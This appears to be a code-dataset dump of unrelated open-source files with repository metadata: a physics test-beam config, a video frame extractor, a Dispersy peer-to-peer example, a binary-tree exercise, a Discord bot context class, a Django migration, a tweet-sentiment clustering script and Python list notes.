    streams = cms.untracked.vstring('Chunk699', 'HCAL_Trigger', 'HCAL_SlowData', 'HCAL_QADCTDC', 'HCAL_DCC021')
)

# Unpack test-beam objects (trigger, slow data, QADC/TDC, VLSB) from their FEDs.
process.tbunpack = cms.EDFilter("HcalTBObjectUnpacker",
    HcalTriggerFED = cms.untracked.int32(1),
    HcalVLSBFED = cms.untracked.int32(699),
    HcalTDCFED = cms.untracked.int32(8),
    HcalQADCFED = cms.untracked.int32(8),
    HcalSlowDataFED = cms.untracked.int32(3),
    ConfigurationFile = cms.untracked.string('configQADCTDC_TB2009.txt')
)

# Produce VLSB sample information over samples 0-31; only motherboard 0 enabled.
process.vlsbinfo = cms.EDProducer("VLSBInformationProducer",
    minSample = cms.untracked.uint32(0),
    maxSample = cms.untracked.uint32(31),
    baselineSamples = cms.untracked.uint32(2),
    mip = cms.untracked.string("MIP_EarlyRejection.txt"),
    useMotherBoard0 = cms.untracked.bool(True),
    useMotherBoard1 = cms.untracked.bool(False),
    useMotherBoard2 = cms.untracked.bool(False),
    useMotherBoard3 = cms.untracked.bool(False),
    usePedestalMean = cms.untracked.bool(False)
)

# Keep only single-tower particle candidates.
process.ABCcut = cms.EDFilter("SingleTowerParticleFilter")

# Hit-position cut (maximum = -5; units defined by the HitXFilter plugin).
process.hitcut = cms.EDFilter("HitXFilter",
    maximum = cms.untracked.double(-5)
)

# Throttle framework logging to one report every 100 events.
process.MessageLogger = cms.Service("MessageLogger",
    default = cms.untracked.PSet(
        reportEvery = cms.untracked.int32(100)
    )
)

# Two pulse-timing analyzers over different sample windows (15-1000 and 0-40),
# each writing its own ROOT output file.
process.alignpion2 = cms.EDAnalyzer("AlignPulseAnalyzer",
    rejectionSample = cms.untracked.int32(2),
    rejectionHeight = cms.untracked.double(0.1),
    output = cms.untracked.string("Time_108538_2.root"),
    maxsample = cms.untracked.double(1000),
    minsample = cms.untracked.double(15)
)

process.alignpion1 = cms.EDAnalyzer("AlignPulseAnalyzer",
    rejectionSample = cms.untracked.int32(2),
    rejectionHeight = cms.untracked.double(0.1),
    output = cms.untracked.string("Time_108538_1.root"),
    maxsample = cms.untracked.double(40),
    minsample = cms.untracked.double(0)
)

# Execution order: unpack -> single-tower cut -> VLSB info -> hit cut -> timing.
process.p = cms.Path(
    process.tbunpack *
    process.ABCcut *
    process.vlsbinfo *
    process.hitcut *
    process.alignpion1 *
    process.alignpion2
)
|
[
"yichen@positron01.hep.caltech.edu"
] |
yichen@positron01.hep.caltech.edu
|
932d44e25a32ff21e1959a43d5d237c442cbc79f
|
d9e8996b363cb17282633b5d97ed234fbafa4ed5
|
/extrai_frame.py
|
72f1a56bbbdb92330c6bb2b1be8eb06f84b1f55e
|
[] |
no_license
|
cardosolh/MachineLearning
|
952e068a05f0a10e5968126780440104bd46cd9a
|
f711837a27924bfbf4342dc3154dbe2392a597c0
|
refs/heads/master
| 2020-03-22T13:20:45.639561
| 2018-07-07T14:02:28
| 2018-07-07T14:02:28
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 548
|
py
|
import cv2
import os

# Extract roughly every 28th frame from the input video, saving each one under
# frames/ and displaying it (blocking until a key is pressed).
vidcap = cv2.VideoCapture('videos/video.mp4')
success, image = vidcap.read()
count = 0   # index used in the saved file name frames/frame<count>.jpg
cont = 1    # frames seen since the last save
while success:
    success, image = vidcap.read()
    if not success:
        # BUG FIX: the original continued after a failed read, so at end of
        # video cv2.imwrite()/imshow() could be called with image == None.
        # (It also forced success = True before the loop, entering the loop
        # even when the very first read failed.)
        break
    if cont > 27:  # skip 27 frames between saves
        cv2.imwrite("frames/frame%d.jpg" % count, image)  # save frame as JPEG
        cv2.imshow('img', image)   # show the frame on screen
        cv2.waitKey(0)             # block until a key press
        cv2.destroyAllWindows()
        count += 1
        cont = 0
    cont = cont + 1
|
[
"noreply@github.com"
] |
cardosolh.noreply@github.com
|
21eba5db11094720bbdfee684ef20dcab683a4ce
|
d866a4abbfaea885e64a0a55bae4741d964b8e6b
|
/experiments/example_community_threaded.py
|
958fba4329ab3abe50d5d8704d4c01abdb5eab23
|
[] |
no_license
|
qstokkink/VisualDispersy
|
b3c9816f2efc6132758a9077a10c892b2176917d
|
bd221cb2951574870c9f04253429655ddc9fea0e
|
refs/heads/master
| 2020-12-24T18:55:46.222286
| 2016-05-08T08:40:09
| 2016-05-08T08:40:09
| 57,215,998
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 11,983
|
py
|
"""An example community (FloodCommunity) to both show
how Dispersy works and how VisualDispersy works.
Credit for the original tutorial Community goes to Boudewijn Schoon.
"""
import logging
import struct
import sys
import time
import string
import os.path
# Void all Dispersy log messages
logging.basicConfig(level=logging.CRITICAL)
logging.getLogger().propagate = False
from M2Crypto import EC, BIO
from twisted.internet import reactor, threads
from dispersy.authentication import MemberAuthentication
from dispersy.community import Community
from dispersy.conversion import DefaultConversion, BinaryConversion
from dispersy.destination import CommunityDestination
from dispersy.dispersy import Dispersy
from dispersy.distribution import FullSyncDistribution
from dispersy.endpoint import StandaloneEndpoint
from dispersy.member import DummyMember
from dispersy.message import Message, DropPacket, DropMessage, BatchConfiguration
from dispersy.payload import Payload
from dispersy.resolution import PublicResolution
from dispersyviz.visualdispersy import VisualDispersy, VisualCommunity
class FloodCommunity(VisualCommunity):
    """A simple community to exemplify Dispersy behavior.

    Floods u"flood" messages to all members and reports delivery progress
    to VisualDispersy.
    """

    def __init__(self, dispersy, master_member, my_member):
        """Callback for when Dispersy initializes this community.

        Note that this function signature is a Dispersy requirement.
        """
        super(FloodCommunity, self).__init__(dispersy, master_member, my_member)
        # Number of u"flood" messages received so far (updated in on_flood()).
        self.message_received = 0

    def initiate_conversions(self):
        """Tell Dispersy what wire conversion handlers we have."""
        return [DefaultConversion(self), FloodConversion(self)]

    @property
    def dispersy_auto_download_master_member(self):
        """Do not automatically download our (bogus) master member."""
        return False

    @property
    def dispersy_enable_fast_candidate_walker(self):
        # Enable the fast walker so peers find each other quickly.
        return True

    def initiate_meta_messages(self):
        """>EXTEND< the current meta messages with our custom Flood type."""
        messages = super(FloodCommunity, self).initiate_meta_messages()
        ourmessages = [Message(self,
                               u"flood",  # Unique identifier
                               MemberAuthentication(encoding="sha1"),  # Member identifier hash type
                               PublicResolution(),  # All members can add messages
                               FullSyncDistribution(enable_sequence_number=False,
                                                    synchronization_direction=u"ASC",
                                                    priority=255),
                               # Synchronize without sequence number, delivering messages with the
                               # lowest (Lamport) global time first and the highest priority
                               CommunityDestination(node_count=10),  # Push to >AT MOST< 10 other nodes initially
                               FloodPayload(),  # The object to actually carry our payload
                               self.check_flood,  # Callback to validate a received message
                               self.on_flood,  # Callback to actually handle a validated message
                               batch=BatchConfiguration(0.0))]  # Seconds to save up messages before handling them
        messages.extend(ourmessages)
        return messages

    def create_flood(self, count):
        """Dump `count` messages into the Community overlay."""
        self.start_flood_time = time.time()
        if count <= 0:
            return
        # Retrieve the meta object we defined in initiate_meta_messages()
        meta = self.get_meta_message(u"flood")
        # Instantiate the messages; payload ids are globally unique per peer.
        messages = [meta.impl(authentication=(self.my_member,),  # This client signs this message
                              distribution=(self.claim_global_time(),),
                              # Without sequence numbers you just need our value of the Lamport clock
                              payload=("flood #%d" % (i + (self.peerid - 1) * count),))  # Arbitrary contents
                    for i
                    in xrange(count)]
        # Spread this message into the network (including to ourselves)
        self.dispersy.store_update_forward(messages, True, True, True)

    def check_flood(self, messages):
        """Callback to verify the contents of the messages received."""
        for message in messages:
            # We don't actually check them, just forward them
            # Otherwise check out DropPacket and the like in dispersy.message
            yield message

    def on_flood(self, messages):
        """Callback for when validated messages are received."""
        self.message_received += len(messages)
        # Report to Visual Dispersy
        self.vz_report_target("messages", self.message_received, self.total_message_count)
        if self.message_received == self.total_message_count:
            # Wait for the experiment to end IN A THREAD
            # If you don't do this YOU WILL BLOCK DISPERSY COMPLETELY
            reactor.callInThread(self.wait_for_end)

    def wait_for_end(self):
        """Busy wait for the experiment to end, then shut Dispersy down."""
        self.vz_wait_for_experiment_end()
        self.dispersy.stop()
class FloodPayload(Payload):
    """The data container for FloodCommunity communications."""

    class Implementation(Payload.Implementation):
        def __init__(self, meta, data):
            super(FloodPayload.Implementation, self).__init__(meta)
            # Raw message contents (the string sent on the wire).
            self.data = data
class FloodConversion(BinaryConversion):
    """Convert the payload into binary data (/a string) which can be
    sent over the internet.

    Wire format for u"flood": 4-byte big-endian length prefix ("!L")
    followed by the raw payload bytes.
    """

    def __init__(self, community):
        """Initialize the new Conversion object."""
        # Use community version 1 (only communicates with other version 1's)
        super(FloodConversion, self).__init__(community, "\x01")
        # Our only message type is assigned id 1 (byte), with encode and decode callbacks
        self.define_meta_message(chr(1),
                                 community.get_meta_message(u"flood"),
                                 self._encode_flood,
                                 self._decode_flood)

    def _encode_flood(self, message):
        """The encode callback to convert a Message into a binary representation (string)."""
        return struct.pack("!L", len(message.payload.data)), message.payload.data

    def _decode_flood(self, placeholder, offset, data):
        """Given a binary representation of our payload convert it back to a message.

        Raises DropPacket when the buffer is too short for the length prefix
        or the announced payload; returns (new_offset, payload_implementation).
        """
        if len(data) < offset + 4:
            raise DropPacket("Insufficient packet size")
        data_length, = struct.unpack_from("!L", data, offset)
        offset += 4
        if len(data) < offset + data_length:
            raise DropPacket("Insufficient packet size")
        data_payload = data[offset:offset + data_length]
        offset += data_length
        return offset, placeholder.meta.payload.implement(data_payload)
def join_flood_overlay(dispersy, masterkey, peerid, totalpeers, new_message_count, total_message_count):
    """Join our custom FloodCommunity and start flooding.

    Blocks until `totalpeers` verified candidates are known, then shares
    `new_message_count` messages via create_flood().
    """
    time.sleep(5.0)
    # Use our bogus master member
    master_member = dispersy.get_member(public_key=masterkey)
    # Register our client with Dispersy
    my_member = dispersy.get_new_member()
    # Register our community with Dispersy
    community = FloodCommunity.init_community(dispersy, master_member, my_member)
    # Initialize our custom community, because we can't change the constructor
    community.total_message_count = total_message_count
    community.peerid = peerid
    community.totalpeers = totalpeers
    # Report to Visual Dispersy
    community.vz_report_target("messages", 0, total_message_count)
    print "%d] Joined community" % (dispersy.lan_address[1])
    # Allow the Community members some time to find each other.
    while len(list(community.dispersy_yield_verified_candidates())) < totalpeers:
        time.sleep(1.0)
    print "%d] Flooding community" % (dispersy.lan_address[1])
    # Call our message creation function to share a certain amount
    # of messages with the Community.
    community.create_flood(new_message_count)
def generateMasterkey():
    """Generate a fresh M2Crypto elliptic-curve keypair and return its
    public key as the BASE64 body of the PEM block (header/footer stripped).
    """
    keybuf = BIO.MemoryBuffer()
    keypair = EC.gen_params(EC.NID_sect233k1)
    keypair.gen_key()
    keypair.save_pub_key_bio(keybuf)
    pem = keybuf.read()
    keybuf.reset()
    # Drop the 27-char "-----BEGIN PUBLIC KEY-----\n" header, then cut at the
    # first '-' of the footer line.
    body = pem[27:]
    return body[:string.find(body, '-')]  # BASE64 ENCODED
def establishMasterkey(peerid):
    """Get the master key for this community.

    This is stored in the file 'generated_master_key.key'.
    Peerid 1 is responsible for making sure this file exists; all other
    peers poll until it appears.

    :return: the decoded master key bytes (Python 2 BASE64 str codec).
    """
    if peerid == 1:
        # Peerid 1 makes sure the key file exists
        if not os.path.isfile('generated_master_key.key'):
            f = open('generated_master_key.key', 'w')
            f.write(generateMasterkey())
            f.close()
    else:
        # All other peers simply wait for the keyfile to exist
        # [And pray peer 1 did not crash]
        while not os.path.isfile('generated_master_key.key'):
            time.sleep(0.5)
    keyfile = open('generated_master_key.key', 'r')
    masterkey = keyfile.read().decode("BASE64")
    keyfile.close()
    return masterkey
def stopOnDispersy(dispersy, reactor):
    """Stop the Twisted reactor once Dispersy has shut down.

    Waits an initial 20 s grace period, then polls `dispersy.running`
    every 10 s.  Intended to run in a reactor thread.
    """
    time.sleep(20.0)
    while dispersy.running:
        time.sleep(10.0)
    reactor.stop()
def main(peerid, totalpeers, new_message_count, total_message_count, vz_server_port):
    """VisualDispersy experiment entry point.

    VisualDispersy will call this function with:
    - peerid: [1~totalpeers] our id
    - totalpeers: the total amount of peers in our experiment
    - new_message_count: the amount of messages we are supposed to share
    - total_message_count: the total amount of messages we are supposed to
      receive (including our own)
    - vz_server_port: the server port we need to connect to for VisualDispersy
    """
    # Get the master key
    masterkey = establishMasterkey(peerid)
    # Make an endpoint (starting at port 10000, incrementing until we can open)
    endpoint = StandaloneEndpoint(10000)
    # Create a VisualDispersy instance for the endpoint and store the SQLite 3
    # database in RAM
    dispersy = VisualDispersy(endpoint, u".", u":memory:")
    # Initialize the VisualDispersy server connection
    dispersy.vz_init_server_connection(vz_server_port)
    # Start Dispersy in a thread (it blocks)
    reactor.callInThread(dispersy.start, True)
    # Add an observer to do a clean exit when Dispersy is closed
    reactor.callInThread(stopOnDispersy, dispersy, reactor)
    # Start the experiment in a thread (it sleeps before joining)
    reactor.callInThread(join_flood_overlay,
                         dispersy,
                         masterkey,
                         peerid,
                         totalpeers,
                         new_message_count,
                         total_message_count)
    reactor.run()
|
[
"goqs@hotmail.com"
] |
goqs@hotmail.com
|
b09fa4efa61f4470eac5035edd9f2b31fdba7b31
|
4bedcf0c6b6c9af169f1922423b90e834ff550d1
|
/938-range-sum-of-bst.py
|
b1c8fa80555f4ad670f000252d264a8c1d593740
|
[] |
no_license
|
serdarkuyuk/LeetCode
|
ab5b0b22e6393ff799966cedfa97e5be2ee6163a
|
667683835c18c44f01448304a68a22be422bb0d8
|
refs/heads/master
| 2021-07-03T09:02:51.027772
| 2020-12-26T04:00:47
| 2020-12-26T04:00:47
| 209,383,466
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 916
|
py
|
# 10
# 5 15
# 3 7 x 18
# L = 7, R = 15
#
# 10
# 5 15
# 3 7 13 18
# 1 x 6 x
# L = 6, R = 10
class TreeNode:
    """A binary-tree node: a value plus left/right child links."""

    def __init__(self, val):
        self.val = val                  # node payload
        self.left = self.right = None   # children start unset
# Level-order (heap-layout) input for the tree builder: children of index i
# live at 2*i+1 (left) and 2*i+2 (right); None marks a missing node.
mylist = [10,5,15,3,7,None,18]
def treefunction(mylist, root, i, n):
    """Recursively build a binary tree from the level-order list `mylist`.

    :param mylist: level-order values; index i's children are at 2*i+1 / 2*i+2.
    :param root: node slot being filled (callers pass None; returned unchanged
        when i >= n).
    :param i: index of the current node in the level-order layout.
    :param n: length of mylist.
    :return: the TreeNode rooted at index i, or the passed-in `root` when
        i is out of range.
    """
    if i < n:
        root = TreeNode(mylist[i])
        root.left = treefunction(mylist, root.left, 2*i+1, n)
        # BUG FIX: this was `root.righ = ...`, which stored the right subtree
        # on a misspelled attribute, leaving .right permanently None.
        root.right = treefunction(mylist, root.right, 2*i+2, n)
    return root
def inOrder(root):
    """Print the tree's values in in-order (left, node, right), each followed
    by a single space; prints nothing for an empty tree."""
    if root is None:
        return
    inOrder(root.left)
    print(root.val, end=' ')
    inOrder(root.right)
n = len(mylist)
root = None
# Build the tree from the level-order list, then print its in-order traversal.
root = treefunction(mylist, root, 0, n)
inOrder(root)
|
[
"serdarkuyuk@gmail.com"
] |
serdarkuyuk@gmail.com
|
c2ef3fab0167eea4517258f87dd8245c008b5349
|
cbaca92f7faf606f3263f72e9d7058610b391cbb
|
/utils/context.py
|
3b0ecb193bd085bbbdcbf9d2edd31c3c2a20c938
|
[
"Apache-2.0"
] |
permissive
|
Falsejoey/NabBot
|
83bd811e9404bb3f9bfa2064dc70edfc15f29f19
|
296a14c0f205576f90c31578b8c684ab60c92017
|
refs/heads/master
| 2020-03-24T15:23:26.332312
| 2018-07-24T20:14:24
| 2018-07-24T20:14:24
| 142,788,089
| 0
| 0
|
Apache-2.0
| 2018-07-29T19:05:12
| 2018-07-29T19:05:12
| null |
UTF-8
|
Python
| false
| false
| 10,749
|
py
|
import asyncio
import functools
import re
from typing import Union, Optional, Callable, TypeVar, List, Any, Sequence
import discord
from discord.ext import commands
from utils.config import config
from utils.database import get_server_property
# Matches a raw Discord user mention like <@12345> or <@!12345>, capturing the id.
_mention = re.compile(r'<@!?([0-9]{1,19})>')
# Generic return-type variable used by NabCtx.execute_async.
T = TypeVar('T')
class NabCtx(commands.Context):
"""An override of :class:`commands.Context` that provides properties and methods for NabBot."""
guild: discord.Guild
message: discord.Message
channel: discord.TextChannel
author: Union[discord.User, discord.Member]
me: Union[discord.Member, discord.ClientUser]
command: commands.Command
    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        # Regional-indicator letters used for yes/no reaction prompts.
        self.yes_no_reactions = ("🇾", "🇳")
        # Configured check/cross emojis used for confirm prompts.
        self.check_reactions = (config.true_emoji, config.false_emoji)
    # Properties
    @property
    def author_permissions(self) -> discord.Permissions:
        """Shortcut to check the command author's permissions in the current channel.

        :return: The permissions for the author in the current channel.
        """
        return self.channel.permissions_for(self.author)
@property
def ask_channel_name(self) -> Optional[str]:
"""Gets the name of the ask channel for the current server.
:return: The name of the ask channel if applicable
:rtype: str or None"""
if self.guild is None:
return None
ask_channel_id = get_server_property(self.guild.id, "ask_channel", is_int=True)
ask_channel = self.guild.get_channel(ask_channel_id)
if ask_channel is None:
return config.ask_channel_name
return ask_channel.name
    @property
    def bot_permissions(self) -> discord.Permissions:
        """Shortcut to check the bot's permissions in the current channel.

        :return: The permissions for the bot (self.me) in the current channel."""
        return self.channel.permissions_for(self.me)
@property
def clean_prefix(self) -> str:
"""Gets the clean prefix used in the command invocation.
This is used to clean mentions into plain text."""
m = _mention.match(self.prefix)
if m:
user = self.bot.get_user(int(m.group(1)))
if user:
return f'@{user.name} '
return self.prefix
@property
def is_askchannel(self):
"""Checks if the current channel is the command channel"""
ask_channel_id = get_server_property(self.guild.id, "ask_channel", is_int=True)
ask_channel = self.guild.get_channel(ask_channel_id)
if ask_channel is None:
return self.channel.name == config.ask_channel_name
return ask_channel == self.channel
@property
def is_lite(self) -> bool:
"""Checks if the current context is limited to lite mode.
If the guild is in the lite_guilds list, the context is in lite mode.
If the guild is in private message, and the message author is in at least ONE guild that is not in lite_guilds,
then context is not lite"""
if self.guild is not None:
return self.guild.id in config.lite_servers
if self.is_private:
for g in self.bot.get_user_guilds(self.author.id):
if g.id not in config.lite_servers:
return False
return False
    @property
    def is_private(self) -> bool:
        """Whether the current context is a private (direct message) channel."""
        return self.guild is None
@property
def long(self) -> bool:
"""Whether the current context allows long replies or not
Private messages and command channels allow long replies.
"""
if self.guild is None:
return True
return self.is_askchannel
    @property
    def usage(self) -> str:
        """Shows the parameters signature of the invoked command.

        Uses the command's explicit `usage` string when set; otherwise builds
        one from its cleaned parameters: `[name]`/`[name=default]` for optional
        parameters, `[name...]` for var-positional, `<name>` for required.
        """
        if self.command.usage:
            return self.command.usage
        else:
            params = self.command.clean_params
            if not params:
                return ''
            result = []
            for name, param in params.items():
                if param.default is not param.empty:
                    # We don't want None or '' to trigger the [name=value] case and instead it should
                    # do [name] since [name=None] or [name=] are not exactly useful for the user.
                    should_print = param.default if isinstance(param.default, str) else param.default is not None
                    if should_print:
                        result.append(f'[{name}={param.default!r}]')
                    else:
                        result.append(f'[{name}]')
                elif param.kind == param.VAR_POSITIONAL:
                    result.append(f'[{name}...]')
                else:
                    result.append(f'<{name}>')
            return ' '.join(result)
@property
def world(self) -> Optional[str]:
"""Check the world that is currently being tracked by the guild
:return: The world that the server is tracking.
:rtype: str | None
"""
if self.guild is None:
return None
else:
return self.bot.tracked_worlds.get(self.guild.id, None)
    async def choose(self, matches: Sequence[Any], title="Suggestions"):
        """Ask the author to pick one element of `matches` by replying with its number.

        :param matches: candidate items; raises ValueError when empty, returns
            the single element directly when there is exactly one.
        :param title: title for the suggestions embed.
        :return: the chosen element, or None on timeout or cancel (reply "0").
        """
        if len(matches) == 0:
            raise ValueError('No results found.')
        if len(matches) == 1:
            return matches[0]
        embed = discord.Embed(colour=discord.Colour.blurple(), title=title,
                              description='\n'.join(f'{index}: {item}' for index, item in enumerate(matches, 1)))
        msg = await self.send("I couldn't find what you were looking for, maybe you mean one of these?\n"
                              "**Only say the number** (*0 to cancel*)", embed=embed)

        def check(m: discord.Message):
            # Only all-digit replies from the same author in the same channel count.
            return m.content.isdigit() and m.author.id == self.author.id and m.channel.id == self.channel.id

        message = None
        try:
            message = await self.bot.wait_for('message', check=check, timeout=30.0)
            index = int(message.content)
            if index == 0:
                await self.send("Alright, choosing cancelled.", delete_after=10)
                return None
            try:
                await msg.delete()
                return matches[index - 1]
            except IndexError:
                # Reply was a number outside 1..len(matches).
                await self.send(f"{self.tick(False)} That wasn't in the choices.", delete_after=10)
        except asyncio.TimeoutError:
            return None
        finally:
            # Best-effort cleanup of the author's numeric reply.
            try:
                if message:
                    await message.delete()
            except (discord.Forbidden, discord.NotFound):
                pass
    async def execute_async(self, func: Callable[..., T], *args, **kwargs) -> T:
        """Executes a synchronous function inside an executor.

        :param func: The function to call inside the executor.
        :param args: The function's arguments
        :param kwargs: The function's keyword arguments.
        :return: The value returned by the function, if any.
        """
        # run_in_executor does not accept kwargs, so bind them with functools.partial.
        ret = await self.bot.loop.run_in_executor(None, functools.partial(func, *args, **kwargs))
        return ret
    async def input(self, *, timeout=60.0, clean=False, delete_response=False) \
            -> Optional[str]:
        """Waits for text input from the author.

        :param timeout: Maximum time to wait for a message.
        :param clean: Whether the content should be cleaned or not.
        :param delete_response: Whether to delete the author's message after.
        :return: The content of the message replied by the author, or None on timeout.
        """
        def check(_message):
            # Only accept messages from the command author in the same channel.
            return _message.channel == self.channel and _message.author == self.author
        try:
            value = await self.bot.wait_for("message", timeout=timeout, check=check)
            if clean:
                ret = value.clean_content
            else:
                ret = value.content
            if delete_response:
                # Best effort: deletion may fail without Manage Messages or in DMs.
                try:
                    await value.delete()
                except discord.HTTPException:
                    pass
            return ret
        except asyncio.TimeoutError:
            return None
    async def react_confirm(self, message: discord.Message, *, timeout=60.0, delete_after=False,
                            use_checkmark=False) -> Optional[bool]:
        """Waits for the command author to reply with a Y or N reaction.

        Returns True if the user reacted with Y
        Returns False if the user reacted with N
        Returns None if the user didn't react at all

        :param message: The message that will contain the reactions.
        :param timeout: The maximum time to wait for reactions
        :param delete_after: Whether to delete or not the message after finishing.
        :param use_checkmark: Whether to use or not checkmarks instead of Y/N
        :return: True if reacted with Y, False if reacted with N, None if timeout.
        """
        if not self.channel.permissions_for(self.me).add_reactions:
            raise RuntimeError('Bot does not have Add Reactions permission.')
        # Index 0 is the "yes" emoji, index 1 the "no" emoji.
        reactions = self.check_reactions if use_checkmark else self.yes_no_reactions
        for emoji in reactions:
            # Custom emoji strings come wrapped in <...>; add_reaction expects the
            # bare form — presumably "name:id"; confirm against the emoji constants.
            emoji = emoji.replace("<", "").replace(">", "")
            await message.add_reaction(emoji)

        def check_react(reaction: discord.Reaction, user: discord.User):
            if reaction.message.id != message.id:
                return False
            if user.id != self.author.id:
                return False
            if reaction.emoji not in reactions:
                return False
            return True
        try:
            # wait_for("reaction_add") yields a (reaction, user) pair.
            react = await self.bot.wait_for("reaction_add", timeout=timeout, check=check_react)
            if react[0].emoji == reactions[1]:
                return False
        except asyncio.TimeoutError:
            return None
        finally:
            if delete_after:
                await message.delete()
            elif self.guild is not None:
                # Reactions can only be cleared in guilds, and only with permission.
                try:
                    await message.clear_reactions()
                except discord.Forbidden:
                    pass
        # Reached only when the author reacted with the "yes" emoji.
        return True
def tick(self, value: bool = True, label: str = None) -> str:
"""Displays a checkmark or a cross depending on the value.
:param value: The value to evaluate
:param label: An optional label to display
:return: A checkmark or cross
"""
emoji = self.check_reactions[int(not value)]
if label:
return emoji + label
return emoji
|
[
"allan.galarza@gmail.com"
] |
allan.galarza@gmail.com
|
606666b357f61e92cee16a6e4c4e25719ab20b3b
|
6a7534af8890e92d05634b7fdc84a5995feb5820
|
/mysite0/article/migrations/0001_initial.py
|
69230fcfec233ef7bd2796cd9f5fea087cb7d40f
|
[] |
no_license
|
msyyyy/yywdjango
|
407115c2b09332683909d910b9eae7bbd6619516
|
1bb1857b2476b9e5f19455002f6c29b7c81aae22
|
refs/heads/master
| 2020-04-08T15:01:33.291845
| 2019-02-28T14:14:25
| 2019-02-28T14:14:25
| 159,462,318
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 536
|
py
|
# Generated by Django 2.1.3 on 2018-11-29 11:57
from django.db import migrations, models
class Migration(migrations.Migration):
    """Initial migration: creates the ``Article`` table (auto id, title, content)."""

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Article',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=30)),
                ('content', models.TextField()),
            ],
        ),
    ]
|
[
"243574589@qq.com"
] |
243574589@qq.com
|
64fe03e29e8fc14b706bc7544aebfa30cb1ff528
|
45a0234d1c7df8f605a29484fca838ffcbf82ad2
|
/clustering.py
|
81ee745b519df889fc9741a334cc57bfbedc3aab
|
[] |
no_license
|
Dhavin/Sentiment-analysis-for-Stock-market
|
ba44cb51672094f53c1b328fed39b225147660ff
|
b2d18aabd04e1cfadd5694172c9daeb606cc944a
|
refs/heads/main
| 2023-04-09T06:59:38.905926
| 2021-04-23T18:23:54
| 2021-04-23T18:23:54
| 360,968,820
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,686
|
py
|
import pandas as pd
from scipy import stats
from sklearn.cluster import KMeans
from sklearn.decomposition import PCA
import matplotlib.pyplot as plt
import seaborn as sns
import sys
#from mpl_toolkits.mplot3d import Axes3D
f = input('Enter a Stock : ')
# Load the per-tweet sentiment data for the chosen ticker.
df = pd.read_csv('sentimentdata/' + f + 'sentiment.csv', index_col=0,
                 encoding='latin-1')
# Keep a reference that still carries text/date so cluster labels can be saved with them.
dfold = df
# Drop non-numeric columns before clustering.
# Fix: use the keyword form — the positional `axis` argument of DataFrame.drop
# was deprecated in pandas 1.0 and removed in pandas 2.0.
df = df.drop('text', axis=1)
print(df.head())
df = df.drop('date', axis=1)
print(df.head())
df_tr = df
# select proper number of clusters
'''
Y = df[['followers']]
X = df[['polarity']]
Nc = range(1, 20)
kmeans = [KMeans(n_clusters=i) for i in Nc]
score = [kmeans[i].fit(Y).score(Y) for i in range(len(kmeans))]
plt.plot(Nc,score)
plt.xlabel('Number of Clusters')
plt.ylabel('Score')
plt.title('Elbow Curve')
plt.show()
'''
# elbow plot showed the point of dropoff to be around 5 clusters
# Standardize the features (z-scores) so no single column dominates the distance metric.
clmns = ['followers', 'polarity', 'sentiment_confidence']
df_tr_std = stats.zscore(df_tr[clmns])
# Clustering
kmeans = KMeans(n_clusters=5, random_state=0).fit(df_tr_std)
labels = kmeans.labels_
# Glue back to original data
df_tr['clusters'] = labels
dfold['clusters'] = labels
clmns.extend(['clusters'])
# Per-cluster feature means, for interpreting the clusters.
print(df_tr[clmns].groupby(['clusters']).mean())
# Scatter plot of polarity and confidence, coloured by cluster.
# Fix: lmplot requires x/y as keyword arguments since seaborn 0.12.
sns.lmplot(x='polarity', y='sentiment_confidence',
           data=df_tr,
           fit_reg=False,
           hue="clusters",
           scatter_kws={"marker": "D",
                        "s": 20})
dfold.to_csv('clusterdata/' + f + 'cluster.csv')
plt.title('tweets grouped by polarity and sentiment_confidence')
plt.xlabel('polarity')
plt.ylabel('sentiment_confidences')
plt.show()
|
[
"noreply@github.com"
] |
Dhavin.noreply@github.com
|
a6a347bcf7b13c2043bbaeac195ca1cbb8d5904d
|
a837ba2fd2423a149b952d8ec27c7a08caf00b4f
|
/Input/venv/Scripts/easy_install-script.py
|
7860f47d6ae26894852a1f6183b4778723c2378a
|
[] |
no_license
|
MajidSalimi/Python-Learning
|
7b4ab7834d6391406b8e10f1ad0c43a8e40b5ca6
|
eca845bf2f4fecd89540399bd09282971808fedf
|
refs/heads/master
| 2021-04-02T02:14:30.855096
| 2020-03-28T16:34:23
| 2020-03-28T16:34:23
| 248,233,488
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 454
|
py
|
#!"D:\My Codes\Python\Python-Learning\Input\venv\Scripts\python.exe"
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==40.8.0','console_scripts','easy_install'
# NOTE: auto-generated setuptools console-script wrapper — not meant to be edited by hand.
__requires__ = 'setuptools==40.8.0'
import re
import sys

from pkg_resources import load_entry_point

if __name__ == '__main__':
    # Strip the '-script.py'/'.exe' suffix so argv[0] matches the plain command name.
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(
        load_entry_point('setuptools==40.8.0', 'console_scripts', 'easy_install')()
    )
|
[
"majidsalimib@gmail.com"
] |
majidsalimib@gmail.com
|
7c90494584f621071a20521100575a99fac1e69a
|
2ac003feba0877c9c5aac73da69e778909daf4d1
|
/python_notes/python_102/nested_list/nested_list.py
|
d9595014d16e1f91f223eef767f22674afbc5197
|
[] |
no_license
|
rcollins22/ClassNotes
|
5aefc6f2027ce32b3bda3a00751b48869b34e137
|
0ce39f9170beafc1fb949f2327902d878c14b593
|
refs/heads/master
| 2023-03-03T15:19:57.846513
| 2020-08-24T15:00:59
| 2020-08-24T15:00:59
| 269,222,537
| 3
| 1
| null | 2023-02-28T23:01:50
| 2020-06-04T00:20:50
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 2,062
|
py
|
""" #STRINGS AND LISTS CAN BE NESTED TOGETHER IN AN ARRAY #LISTS CAN BE MADE UP OF OTHER LISTS!!###
atl=['buckhead',
['krog','westside','o4w'] ,
'hapeville'
]
print(atl[1]) #PRINTS ['krog', 'westside', 'o4w']
print(atl[0]) #PRINTS 'buckhead'
#YOU CAN ASSIGN INDEXED ITEMS TO VARIABLES
neighborhoods=atl[1]
